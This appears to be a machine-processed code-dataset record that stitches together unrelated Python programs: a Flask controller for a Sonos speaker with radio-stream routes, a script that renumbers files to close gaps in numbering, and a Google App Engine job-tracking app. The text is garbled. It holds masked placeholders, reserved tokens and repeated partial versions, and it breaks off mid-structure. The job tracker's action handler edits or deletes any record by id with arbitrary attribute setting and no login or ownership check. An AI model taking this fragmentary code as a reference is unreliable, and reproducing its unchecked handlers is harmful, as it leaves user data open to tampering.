\"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://mp3stream1.apasf.apa.at:8000', title=\n 'FM4.ORF.AT', force_radio=True)\n return 'Ok'\n\n\n@app.route('/track_02')\ndef track_02():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer',\n title='Radio PSR Live', force_radio=True)\n return 'Ok'\n\n\n@app.route('/track_03')\ndef track_03():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://nrj.de/sachsen', title='Energy Sachsen',\n force_radio=True)\n return 'Ok'\n\n\n@app.route('/track_04')\ndef track_04():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title=\n 'Sunshine Live', force_radio=True)\n return 'Ok'\n\n\n@app.route('/info-light')\ndef info_light():\n \"\"\"@brief the info-light function \"\"\"\n track = current_track()\n return json.dumps(track)\n\n\n@app.route('/info')\ndef info():\n \"\"\"@brief the info function \"\"\"\n track = current_track()\n track['image'] = get_track_image(track['artist'], track['album'])\n transport = sonos.get_current_transport_info()\n track['playing'] = transport['current_transport_state'] != 'STOPPED'\n track['mute'] = sonos.mute\n return json.dumps(track)\n\n\n<mask token>\n",
"step-4": "<mask token>\napp.config.from_pyfile('settings.py')\n<mask token>\n\n\ndef gen_sig():\n \"\"\"@brief return the MD5 checksum \"\"\"\n return hashlib.md5((app.config['ROVI_API_KEY'] + app.config[\n 'ROVI_SHARED_SECRET'] + repr(int(time.time()))).encode('utf-8')\n ).hexdigest()\n\n\ndef get_track_image(artist, album):\n \"\"\"@brief get the track image from Rovi \"\"\"\n blank_image = url_for('static', filename='img/blank.jpg')\n if 'ROVI_SHARED_SECRET' not in app.config:\n return blank_image\n if 'ROVI_API_KEY' not in app.config:\n return blank_image\n headers = {'Accept-Encoding': 'gzip'}\n req = requests.get(\n 'http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey=' +\n app.config['ROVI_API_KEY'] + '&sig=' + gen_sig() + '&name= ' +\n album + '&performername=' + artist + '&include=images&size=1',\n headers=headers, timeout=30)\n if req.status_code != requests.codes.ok:\n return blank_image\n result = json.loads(req.content)\n try:\n return result['matchResponse']['results'][0]['album']['images'][0][\n 'front'][3]['url']\n except (KeyError, IndexError):\n return blank_image\n\n\ndef current_track():\n \"\"\"@brief get the current track information from Sonos \"\"\"\n track = sonos.get_current_track_info()\n track['title'] = track['title'][:30]\n track['artist'] = track['artist'][:30]\n return track\n\n\n@app.route('/play')\ndef play():\n \"\"\"@brief the play function \"\"\"\n sonos.play()\n return 'Ok'\n\n\n@app.route('/pause')\ndef pause():\n \"\"\"@brief the pause function \"\"\"\n sonos.pause()\n return 'Ok'\n\n\n@app.route('/following')\ndef following():\n \"\"\"@brief the following function \"\"\"\n sonos.next()\n return 'Ok'\n\n\n@app.route('/previous')\ndef previous():\n \"\"\"@brief the previous function \"\"\"\n sonos.previous()\n return 'Ok'\n\n\n@app.route('/volume')\ndef volume():\n \"\"\"@brief get the actual volume \"\"\"\n vol = sonos.volume\n return vol\n\n\n@app.route('/volume_up')\ndef volume_up():\n \"\"\"@brief the volume up function \"\"\"\n sonos.set_relative_volume(10)\n return 'Ok'\n\n\n@app.route('/volume_down')\ndef volume_down():\n \"\"\"@brief the volume down function \"\"\"\n sonos.set_relative_volume(-10)\n return 'Ok'\n\n\n@app.route('/volume_mute')\ndef volume_mute():\n \"\"\"@brief the mute function \"\"\"\n sonos.mute = True\n return 'Ok'\n\n\n@app.route('/volume_unmute')\ndef volume_unmute():\n \"\"\"@brief the unmute function \"\"\"\n sonos.mute = False\n return 'Ok'\n\n\n@app.route('/track_01')\ndef track_01():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://mp3stream1.apasf.apa.at:8000', title=\n 'FM4.ORF.AT', force_radio=True)\n return 'Ok'\n\n\n@app.route('/track_02')\ndef track_02():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer',\n title='Radio PSR Live', force_radio=True)\n return 'Ok'\n\n\n@app.route('/track_03')\ndef track_03():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://nrj.de/sachsen', title='Energy Sachsen',\n force_radio=True)\n return 'Ok'\n\n\n@app.route('/track_04')\ndef track_04():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title=\n 'Sunshine Live', force_radio=True)\n return 'Ok'\n\n\n@app.route('/info-light')\ndef info_light():\n \"\"\"@brief the info-light function \"\"\"\n track = current_track()\n return json.dumps(track)\n\n\n@app.route('/info')\ndef info():\n \"\"\"@brief the info function \"\"\"\n track = current_track()\n track['image'] = get_track_image(track['artist'], track['album'])\n transport = sonos.get_current_transport_info()\n track['playing'] = transport['current_transport_state'] != 'STOPPED'\n track['mute'] = sonos.mute\n return json.dumps(track)\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n \"\"\"@brief the index function \"\"\"\n track = current_track()\n track['image'] = get_track_image(track['artist'], track['album'])\n return render_template('index.html', track=track)\n",
"step-5": "\"\"\"@brief the routes for Flask application\n\"\"\"\nimport hashlib\nimport json\nimport time\n\nimport requests\nfrom flask import render_template, url_for\nfrom soco import SoCo\nfrom app import app\n\napp.config.from_pyfile(\"settings.py\")\nsonos = SoCo(app.config[\"SPEAKER_IP\"])\n\n\ndef gen_sig():\n \"\"\"@brief return the MD5 checksum \"\"\"\n return hashlib.md5(\n (\n app.config[\"ROVI_API_KEY\"]\n + app.config[\"ROVI_SHARED_SECRET\"]\n + repr(int(time.time()))\n ).encode(\"utf-8\")\n ).hexdigest()\n\n\ndef get_track_image(artist, album):\n \"\"\"@brief get the track image from Rovi \"\"\"\n blank_image = url_for(\"static\", filename=\"img/blank.jpg\")\n if \"ROVI_SHARED_SECRET\" not in app.config:\n return blank_image\n if \"ROVI_API_KEY\" not in app.config:\n return blank_image\n\n headers = {\"Accept-Encoding\": \"gzip\"}\n req = requests.get(\n \"http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey=\"\n + app.config[\"ROVI_API_KEY\"]\n + \"&sig=\"\n + gen_sig()\n + \"&name= \"\n + album\n + \"&performername=\"\n + artist\n + \"&include=images&size=1\",\n headers=headers,\n timeout=30,\n )\n\n if req.status_code != requests.codes.ok:\n return blank_image\n\n result = json.loads(req.content)\n try:\n return result[\"matchResponse\"][\"results\"][0][\"album\"][\"images\"][0][\"front\"][3][\"url\"]\n except (KeyError, IndexError):\n return blank_image\n\n\ndef current_track():\n \"\"\"@brief get the current track information from Sonos \"\"\"\n track = sonos.get_current_track_info()\n track[\"title\"] = track[\"title\"][:30]\n track[\"artist\"] = track[\"artist\"][:30]\n return track\n\n\n@app.route(\"/play\")\ndef play():\n \"\"\"@brief the play function \"\"\"\n sonos.play()\n return \"Ok\"\n\n\n@app.route(\"/pause\")\ndef pause():\n \"\"\"@brief the pause function \"\"\"\n sonos.pause()\n return \"Ok\"\n\n\n@app.route(\"/following\")\ndef following():\n \"\"\"@brief the following function \"\"\"\n sonos.next()\n return \"Ok\"\n\n\n@app.route(\"/previous\")\ndef previous():\n \"\"\"@brief the previous function \"\"\"\n sonos.previous()\n return \"Ok\"\n\n\n@app.route(\"/volume\")\ndef volume():\n \"\"\"@brief get the actual volume \"\"\"\n vol = sonos.volume\n return vol\n\n\n@app.route(\"/volume_up\")\ndef volume_up():\n \"\"\"@brief the volume up function \"\"\"\n sonos.set_relative_volume(10)\n return \"Ok\"\n\n\n@app.route(\"/volume_down\")\ndef volume_down():\n \"\"\"@brief the volume down function \"\"\"\n sonos.set_relative_volume(-10)\n return \"Ok\"\n\n\n@app.route(\"/volume_mute\")\ndef volume_mute():\n \"\"\"@brief the mute function \"\"\"\n sonos.mute = True\n return \"Ok\"\n\n\n@app.route(\"/volume_unmute\")\ndef volume_unmute():\n \"\"\"@brief the unmute function \"\"\"\n sonos.mute = False\n return \"Ok\"\n\n\n@app.route(\"/track_01\")\ndef track_01():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://mp3stream1.apasf.apa.at:8000', title='FM4.ORF.AT', force_radio=True)\n return \"Ok\"\n\n\n@app.route(\"/track_02\")\ndef track_02():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer', title='Radio PSR Live', force_radio=True)\n return \"Ok\"\n\n\n@app.route(\"/track_03\")\ndef track_03():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://nrj.de/sachsen', title='Energy Sachsen', force_radio=True)\n return \"Ok\"\n\n\n@app.route(\"/track_04\")\ndef track_04():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title='Sunshine Live', force_radio=True)\n return \"Ok\"\n\n\n@app.route(\"/info-light\")\ndef info_light():\n \"\"\"@brief the info-light function \"\"\"\n track = current_track()\n return json.dumps(track)\n\n\n@app.route(\"/info\")\ndef info():\n \"\"\"@brief the info function \"\"\"\n track = current_track()\n track[\"image\"] = get_track_image(track[\"artist\"], track[\"album\"])\n transport = sonos.get_current_transport_info()\n track[\"playing\"] = transport[\"current_transport_state\"] != \"STOPPED\"\n track[\"mute\"] = sonos.mute\n return json.dumps(track)\n\n\n@app.route(\"/\")\n@app.route('/index')\ndef index():\n \"\"\"@brief the index function \"\"\"\n track = current_track()\n track[\"image\"] = get_track_image(track[\"artist\"], track[\"album\"])\n return render_template(\"index.html\", track=track)\n",
"step-ids": [
16,
17,
18,
20,
23
]
}
|
[
16,
17,
18,
20,
23
] |
<|reserved_special_token_0|>
def create_test_file(filename):
with open(filename, 'w') as f:
f.write('foobar')
<|reserved_special_token_0|>
def main():
parser = argparse.ArgumentParser(description='Filling In The Gaps program')
parser.add_argument('-d', '--dir', help='Directory path.', dest=
'dir_path', required=True)
parser.add_argument('--file-prefix', required=True, help=
'File name prefix.')
parser.add_argument('-c', action='store_true', dest='create_tt', help=
'Create test tree.')
args = parser.parse_args()
if args.create_tt:
create_test_files(args.dir_path, args.file_prefix)
prev_num = 0
for filename in os.listdir(args.dir_path):
if re.match('{0}\\d{{3}}'.format(args.file_prefix), filename):
curr_num = int(filename.split(args.file_prefix)[1])
expected_num = prev_num + 1
if curr_num != expected_num:
old_path = os.path.join(args.dir_path, filename)
new_path = os.path.join(args.dir_path, '{}{:03d}'.format(
args.file_prefix, expected_num))
shutil.move(old_path, new_path)
curr_num = expected_num
prev_num = curr_num
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def create_test_file(filename):
with open(filename, 'w') as f:
f.write('foobar')
def create_test_files(test_dir, file_prefix):
if os.path.exists(test_dir):
shutil.rmtree(test_dir)
os.mkdir(test_dir)
for i in range(1, 10):
if i in [2, 8]:
i += 1
testfile_path = os.path.join(test_dir, '{}{:03d}'.format(
file_prefix, i))
create_test_file(testfile_path)
def main():
parser = argparse.ArgumentParser(description='Filling In The Gaps program')
parser.add_argument('-d', '--dir', help='Directory path.', dest=
'dir_path', required=True)
parser.add_argument('--file-prefix', required=True, help=
'File name prefix.')
parser.add_argument('-c', action='store_true', dest='create_tt', help=
'Create test tree.')
args = parser.parse_args()
if args.create_tt:
create_test_files(args.dir_path, args.file_prefix)
prev_num = 0
for filename in os.listdir(args.dir_path):
if re.match('{0}\\d{{3}}'.format(args.file_prefix), filename):
curr_num = int(filename.split(args.file_prefix)[1])
expected_num = prev_num + 1
if curr_num != expected_num:
old_path = os.path.join(args.dir_path, filename)
new_path = os.path.join(args.dir_path, '{}{:03d}'.format(
args.file_prefix, expected_num))
shutil.move(old_path, new_path)
curr_num = expected_num
prev_num = curr_num
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def create_test_file(filename):
with open(filename, 'w') as f:
f.write('foobar')
def create_test_files(test_dir, file_prefix):
if os.path.exists(test_dir):
shutil.rmtree(test_dir)
os.mkdir(test_dir)
for i in range(1, 10):
if i in [2, 8]:
i += 1
testfile_path = os.path.join(test_dir, '{}{:03d}'.format(
file_prefix, i))
create_test_file(testfile_path)
def main():
parser = argparse.ArgumentParser(description='Filling In The Gaps program')
parser.add_argument('-d', '--dir', help='Directory path.', dest=
'dir_path', required=True)
parser.add_argument('--file-prefix', required=True, help=
'File name prefix.')
parser.add_argument('-c', action='store_true', dest='create_tt', help=
'Create test tree.')
args = parser.parse_args()
if args.create_tt:
create_test_files(args.dir_path, args.file_prefix)
prev_num = 0
for filename in os.listdir(args.dir_path):
if re.match('{0}\\d{{3}}'.format(args.file_prefix), filename):
curr_num = int(filename.split(args.file_prefix)[1])
expected_num = prev_num + 1
if curr_num != expected_num:
old_path = os.path.join(args.dir_path, filename)
new_path = os.path.join(args.dir_path, '{}{:03d}'.format(
args.file_prefix, expected_num))
shutil.move(old_path, new_path)
curr_num = expected_num
prev_num = curr_num
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import os
import shutil
import re
import argparse
def create_test_file(filename):
with open(filename, 'w') as f:
f.write('foobar')
def create_test_files(test_dir, file_prefix):
if os.path.exists(test_dir):
shutil.rmtree(test_dir)
os.mkdir(test_dir)
for i in range(1, 10):
if i in [2, 8]:
i += 1
testfile_path = os.path.join(test_dir, '{}{:03d}'.format(
file_prefix, i))
create_test_file(testfile_path)
def main():
parser = argparse.ArgumentParser(description='Filling In The Gaps program')
parser.add_argument('-d', '--dir', help='Directory path.', dest=
'dir_path', required=True)
parser.add_argument('--file-prefix', required=True, help=
'File name prefix.')
parser.add_argument('-c', action='store_true', dest='create_tt', help=
'Create test tree.')
args = parser.parse_args()
if args.create_tt:
create_test_files(args.dir_path, args.file_prefix)
prev_num = 0
for filename in os.listdir(args.dir_path):
if re.match('{0}\\d{{3}}'.format(args.file_prefix), filename):
curr_num = int(filename.split(args.file_prefix)[1])
expected_num = prev_num + 1
if curr_num != expected_num:
old_path = os.path.join(args.dir_path, filename)
new_path = os.path.join(args.dir_path, '{}{:03d}'.format(
args.file_prefix, expected_num))
shutil.move(old_path, new_path)
curr_num = expected_num
prev_num = curr_num
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
#! python3
import os
import shutil
import re
import argparse
def create_test_file(filename):
with open(filename, "w") as f:
f.write("foobar")
def create_test_files(test_dir, file_prefix):
if os.path.exists(test_dir):
shutil.rmtree(test_dir)
os.mkdir(test_dir)
for i in range(1, 10):
# Introduce gaps
if i in [2, 8]:
i += 1
testfile_path = os.path.join(test_dir,
"{}{:03d}".format(file_prefix, i))
create_test_file(testfile_path)
def main():
parser = argparse.ArgumentParser(description='Filling In The Gaps program')
parser.add_argument('-d', '--dir',
help="Directory path.",
dest='dir_path',
required=True)
parser.add_argument('--file-prefix',
required=True,
help='File name prefix.')
parser.add_argument('-c', action='store_true',
dest='create_tt',
help='Create test tree.')
args = parser.parse_args()
if args.create_tt:
create_test_files(args.dir_path, args.file_prefix)
prev_num = 0
for filename in os.listdir(args.dir_path):
if re.match(r"{0}\d{{3}}".format(args.file_prefix), filename):
curr_num = int(filename.split(args.file_prefix)[1])
expected_num = prev_num + 1
if curr_num != expected_num:
old_path = os.path.join(args.dir_path, filename)
new_path = os.path.join(args.dir_path, "{}{:03d}".format(
args.file_prefix, expected_num))
shutil.move(old_path, new_path)
curr_num = expected_num
prev_num = curr_num
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "db684185c2b0a26cb101dc40090c84b64c554eeb",
"index": 2595,
"step-1": "<mask token>\n\n\ndef create_test_file(filename):\n with open(filename, 'w') as f:\n f.write('foobar')\n\n\n<mask token>\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Filling In The Gaps program')\n parser.add_argument('-d', '--dir', help='Directory path.', dest=\n 'dir_path', required=True)\n parser.add_argument('--file-prefix', required=True, help=\n 'File name prefix.')\n parser.add_argument('-c', action='store_true', dest='create_tt', help=\n 'Create test tree.')\n args = parser.parse_args()\n if args.create_tt:\n create_test_files(args.dir_path, args.file_prefix)\n prev_num = 0\n for filename in os.listdir(args.dir_path):\n if re.match('{0}\\\\d{{3}}'.format(args.file_prefix), filename):\n curr_num = int(filename.split(args.file_prefix)[1])\n expected_num = prev_num + 1\n if curr_num != expected_num:\n old_path = os.path.join(args.dir_path, filename)\n new_path = os.path.join(args.dir_path, '{}{:03d}'.format(\n args.file_prefix, expected_num))\n shutil.move(old_path, new_path)\n curr_num = expected_num\n prev_num = curr_num\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_test_file(filename):\n with open(filename, 'w') as f:\n f.write('foobar')\n\n\ndef create_test_files(test_dir, file_prefix):\n if os.path.exists(test_dir):\n shutil.rmtree(test_dir)\n os.mkdir(test_dir)\n for i in range(1, 10):\n if i in [2, 8]:\n i += 1\n testfile_path = os.path.join(test_dir, '{}{:03d}'.format(\n file_prefix, i))\n create_test_file(testfile_path)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Filling In The Gaps program')\n parser.add_argument('-d', '--dir', help='Directory path.', dest=\n 'dir_path', required=True)\n parser.add_argument('--file-prefix', required=True, help=\n 'File name prefix.')\n parser.add_argument('-c', action='store_true', dest='create_tt', help=\n 'Create test tree.')\n args = parser.parse_args()\n if args.create_tt:\n create_test_files(args.dir_path, args.file_prefix)\n prev_num = 0\n for filename in os.listdir(args.dir_path):\n if re.match('{0}\\\\d{{3}}'.format(args.file_prefix), filename):\n curr_num = int(filename.split(args.file_prefix)[1])\n expected_num = prev_num + 1\n if curr_num != expected_num:\n old_path = os.path.join(args.dir_path, filename)\n new_path = os.path.join(args.dir_path, '{}{:03d}'.format(\n args.file_prefix, expected_num))\n shutil.move(old_path, new_path)\n curr_num = expected_num\n prev_num = curr_num\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef create_test_file(filename):\n with open(filename, 'w') as f:\n f.write('foobar')\n\n\ndef create_test_files(test_dir, file_prefix):\n if os.path.exists(test_dir):\n shutil.rmtree(test_dir)\n os.mkdir(test_dir)\n for i in range(1, 10):\n if i in [2, 8]:\n i += 1\n testfile_path = os.path.join(test_dir, '{}{:03d}'.format(\n file_prefix, i))\n create_test_file(testfile_path)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Filling In The Gaps program')\n parser.add_argument('-d', '--dir', help='Directory path.', dest=\n 'dir_path', required=True)\n parser.add_argument('--file-prefix', required=True, help=\n 'File name prefix.')\n parser.add_argument('-c', action='store_true', dest='create_tt', help=\n 'Create test tree.')\n args = parser.parse_args()\n if args.create_tt:\n create_test_files(args.dir_path, args.file_prefix)\n prev_num = 0\n for filename in os.listdir(args.dir_path):\n if re.match('{0}\\\\d{{3}}'.format(args.file_prefix), filename):\n curr_num = int(filename.split(args.file_prefix)[1])\n expected_num = prev_num + 1\n if curr_num != expected_num:\n old_path = os.path.join(args.dir_path, filename)\n new_path = os.path.join(args.dir_path, '{}{:03d}'.format(\n args.file_prefix, expected_num))\n shutil.move(old_path, new_path)\n curr_num = expected_num\n prev_num = curr_num\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import os\nimport shutil\nimport re\nimport argparse\n\n\ndef create_test_file(filename):\n with open(filename, 'w') as f:\n f.write('foobar')\n\n\ndef create_test_files(test_dir, file_prefix):\n if os.path.exists(test_dir):\n shutil.rmtree(test_dir)\n os.mkdir(test_dir)\n for i in range(1, 10):\n if i in [2, 8]:\n i += 1\n testfile_path = os.path.join(test_dir, '{}{:03d}'.format(\n file_prefix, i))\n create_test_file(testfile_path)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Filling In The Gaps program')\n parser.add_argument('-d', '--dir', help='Directory path.', dest=\n 'dir_path', required=True)\n parser.add_argument('--file-prefix', required=True, help=\n 'File name prefix.')\n parser.add_argument('-c', action='store_true', dest='create_tt', help=\n 'Create test tree.')\n args = parser.parse_args()\n if args.create_tt:\n create_test_files(args.dir_path, args.file_prefix)\n prev_num = 0\n for filename in os.listdir(args.dir_path):\n if re.match('{0}\\\\d{{3}}'.format(args.file_prefix), filename):\n curr_num = int(filename.split(args.file_prefix)[1])\n expected_num = prev_num + 1\n if curr_num != expected_num:\n old_path = os.path.join(args.dir_path, filename)\n new_path = os.path.join(args.dir_path, '{}{:03d}'.format(\n args.file_prefix, expected_num))\n shutil.move(old_path, new_path)\n curr_num = expected_num\n prev_num = curr_num\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#! python3\nimport os\nimport shutil\nimport re\nimport argparse\n\n\ndef create_test_file(filename):\n with open(filename, \"w\") as f:\n f.write(\"foobar\")\n\n\ndef create_test_files(test_dir, file_prefix):\n if os.path.exists(test_dir):\n shutil.rmtree(test_dir)\n os.mkdir(test_dir)\n for i in range(1, 10):\n # Introduce gaps\n if i in [2, 8]:\n i += 1\n testfile_path = os.path.join(test_dir,\n \"{}{:03d}\".format(file_prefix, i))\n create_test_file(testfile_path)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Filling In The Gaps program')\n parser.add_argument('-d', '--dir',\n help=\"Directory path.\",\n dest='dir_path',\n required=True)\n parser.add_argument('--file-prefix',\n required=True,\n help='File name prefix.')\n parser.add_argument('-c', action='store_true',\n dest='create_tt',\n help='Create test tree.')\n\n args = parser.parse_args()\n\n if args.create_tt:\n create_test_files(args.dir_path, args.file_prefix)\n\n prev_num = 0\n for filename in os.listdir(args.dir_path):\n if re.match(r\"{0}\\d{{3}}\".format(args.file_prefix), filename):\n curr_num = int(filename.split(args.file_prefix)[1])\n expected_num = prev_num + 1\n if curr_num != expected_num:\n old_path = os.path.join(args.dir_path, filename)\n new_path = os.path.join(args.dir_path, \"{}{:03d}\".format(\n args.file_prefix, expected_num))\n shutil.move(old_path, new_path)\n curr_num = expected_num\n prev_num = curr_num\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import urllib2, os, logging, webapp2, random
#use logging.info("") to print stuff
from google.appengine.ext import webapp
from webapp2_extras import sessions
from google.appengine.ext.webapp import template
from google.appengine.ext import db
from conf import USERS, SESSION_KEY
from google.appengine.ext.db import BadValueError
class Job(db.Model):
title = db.StringProperty()
link = db.LinkProperty()
notes = db.TextProperty()
location = db.StringProperty()
compensation = db.StringProperty()
user = db.StringProperty()
class BaseHandler(webapp2.RequestHandler):
def unset_session(self):
self.session['user'] = ""
def dispatch(self):
self.session_store = sessions.get_store(request=self.request)
try:
webapp2.RequestHandler.dispatch(self)
finally:
self.session_store.save_sessions(self.response)
@webapp2.cached_property
def session(self):
return self.session_store.get_session()
def render_restricted_template(self, view_filename, params={}):
if ('user' in self.session and self.session['user'] != ""):
self.render_template(view_filename, params)
else:
self.render_template('message.html', {'msg': 'Not Logged in.', 'login': True, 'Error': True})
def render_template(self, view_filename, params={}):
path = os.path.join(os.path.dirname(__file__), 'templates', view_filename)
self.response.out.write(template.render(path, params))
class MainHandler(BaseHandler):
def get(self):
jobs = db.GqlQuery("SELECT * FROM Job WHERE user =:username", username=self.session['user'])
jobs_wid = []
for job in jobs:
jobs_wid.append([job, job.key().id()])
self.render_restricted_template('index.html', {'jobs': jobs_wid})
class ActionHandler(BaseHandler):
def get(self):
self.render_restricted_template('index.html', {})
def post(self):
#modify param value
if self.request.get('action') == 'modify' and self.request.get('id') and self.request.get('param') and self.request.get('value'):
job = Job.get_by_id(int(self.request.get('id')))
setattr(job, self.request.get('param'), self.request.get('value'))
job.put()
elif self.request.get('action') == 'delete' and self.request.get('id'):
job = Job.get_by_id(int(self.request.get('id')))
job.delete()
self.render_restricted_template('index.html', {})
class AddJobHandler(BaseHandler):
def get(self):
self.render_restricted_template('index.html', {})
def post(self):
try:
if self.request.get('link'):
link = self.request.get('link')
else:
link = None
job = Job(title=self.request.get('title'), link=link, notes=self.request.get('notes'), location=self.request.get('location'), compensation=self.request.get('compensation'), user=self.session['user'])
job.put()
self.render_restricted_template('index.html', {})
except BadValueError:
self.render_template('message.html', {'msg': 'Invalid Link', 'login': False, 'Error': True})
class LoginHandler(BaseHandler):
def get(self):
self.render_template('message.html', {'msg': 'Not Logged in.', 'login': True, 'Error': True})
def post(self):
if self.request.get('username') in USERS and USERS[self.request.get('username')] == self.request.get('password'):
self.session['user'] = self.request.get('username')
self.render_template('index.html', {'login': True})
else:
self.render_template('message.html', {'msg': 'Incorrect Credentials.', 'login': True, 'Error': True})
class LogoutHandler(BaseHandler):
def get(self):
self.session['user'] = ""
self.render_template('message.html', {'msg': 'Successfully Logged Out.'})
config = {'webapp2_extras.sessions': {'secret_key': SESSION_KEY}}
app = webapp2.WSGIApplication([
webapp2.Route('/', MainHandler, name='home'),
webapp2.Route('/login', LoginHandler, name='login'),
webapp2.Route('/logout', LogoutHandler, name='logout'),
webapp2.Route('/action', ActionHandler, name='action'),
webapp2.Route('/addjob', AddJobHandler, name='addjob')
], config=config, debug=True)
|
normal
|
{
"blob_id": "e7ef8debbff20cb178a3870b9618cbb0652af5af",
"index": 1626,
"step-1": "#!/usr/bin/env python\n#\n# Copyright 2007 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport urllib2, os, logging, webapp2, random\n#use logging.info(\"\") to print stuff\nfrom google.appengine.ext import webapp\nfrom webapp2_extras import sessions\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext import db\nfrom conf import USERS, SESSION_KEY\nfrom google.appengine.ext.db import BadValueError\n\nclass Job(db.Model):\n\ttitle = db.StringProperty()\n\tlink = db.LinkProperty()\n\tnotes = db.TextProperty()\n\tlocation = db.StringProperty()\n\tcompensation = db.StringProperty()\n\tuser = db.StringProperty()\n\nclass BaseHandler(webapp2.RequestHandler):\n\tdef unset_session(self):\n\t\tself.session['user'] = \"\"\n\n\tdef dispatch(self):\n\t\tself.session_store = sessions.get_store(request=self.request)\n\t\ttry:\n\t\t\twebapp2.RequestHandler.dispatch(self)\n\t\tfinally:\n\t\t\tself.session_store.save_sessions(self.response)\n\n\t@webapp2.cached_property\n\tdef session(self):\n\t\treturn self.session_store.get_session()\n\n\tdef render_restricted_template(self, view_filename, params={}):\n\t\tif ('user' in self.session and self.session['user'] != \"\"):\n\t\t\tself.render_template(view_filename, params)\n\t\telse:\n\t\t\tself.render_template('message.html', {'msg': 'Not Logged in.', 'login': True, 'Error': True})\n\t\t\n\tdef render_template(self, view_filename, params={}):\n\t\tpath = os.path.join(os.path.dirname(__file__), 'templates', view_filename)\n\t\tself.response.out.write(template.render(path, params))\n\nclass MainHandler(BaseHandler):\n\tdef get(self):\n\t\tjobs = db.GqlQuery(\"SELECT * FROM Job WHERE user =:username\", username=self.session['user'])\n\t\tjobs_wid = []\n\t\tfor job in jobs:\n\t\t\tjobs_wid.append([job, job.key().id()])\n\t\tself.render_restricted_template('index.html', {'jobs': jobs_wid})\n\nclass ActionHandler(BaseHandler):\n\tdef get(self):\n\t\tself.render_restricted_template('index.html', {})\n\tdef post(self):\n\t\t#modify param value\n\t\tif self.request.get('action') == 'modify' and self.request.get('id') and self.request.get('param') and self.request.get('value'):\n\t\t\tjob = Job.get_by_id(int(self.request.get('id')))\n\t\t\tsetattr(job, self.request.get('param'), self.request.get('value'))\n\t\t\tjob.put()\n\t\telif self.request.get('action') == 'delete' and self.request.get('id'):\n\t\t\tjob = Job.get_by_id(int(self.request.get('id')))\n\t\t\tjob.delete()\n\t\tself.render_restricted_template('index.html', {})\n\nclass AddJobHandler(BaseHandler):\n\tdef get(self):\n\t\tself.render_restricted_template('index.html', {})\n\tdef post(self):\n\t\ttry:\n\t\t\tif self.request.get('link'):\n\t\t\t\tlink = self.request.get('link')\n\t\t\telse:\n\t\t\t\tlink = None\n\t\t\tjob = Job(title=self.request.get('title'), link=link, notes=self.request.get('notes'), location=self.request.get('location'), compensation=self.request.get('compensation'), user=self.session['user'])\n\t\t\tjob.put()\n\t\t\tself.render_restricted_template('index.html', {})\n\t\texcept BadValueError:\n\t\t\tself.render_template('message.html', {'msg': 'Invalid Link', 'login': False, 'Error': True})\n\n\nclass LoginHandler(BaseHandler):\n\tdef get(self):\n\t\tself.render_template('message.html', {'msg': 'Not Logged in.', 'login': True, 'Error': True})\n\tdef post(self):\n\t\tif self.request.get('username') in USERS and USERS[self.request.get('username')] == self.request.get('password'):\n\t\t\tself.session['user'] = self.request.get('username')\n\t\t\tself.render_template('index.html', {'login': True})\n\t\telse:\n\t\t\tself.render_template('message.html', {'msg': 'Incorrect Credentials.', 'login': True, 'Error': True})\n\nclass LogoutHandler(BaseHandler):\n def get(self):\n\t\tself.session['user'] = \"\"\n\t\tself.render_template('message.html', {'msg': 'Successfully Logged Out.'})\n\nconfig = {'webapp2_extras.sessions': {'secret_key': SESSION_KEY}}\napp = webapp2.WSGIApplication([\n webapp2.Route('/', MainHandler, name='home'),\n webapp2.Route('/login', LoginHandler, name='login'),\n webapp2.Route('/logout', LogoutHandler, 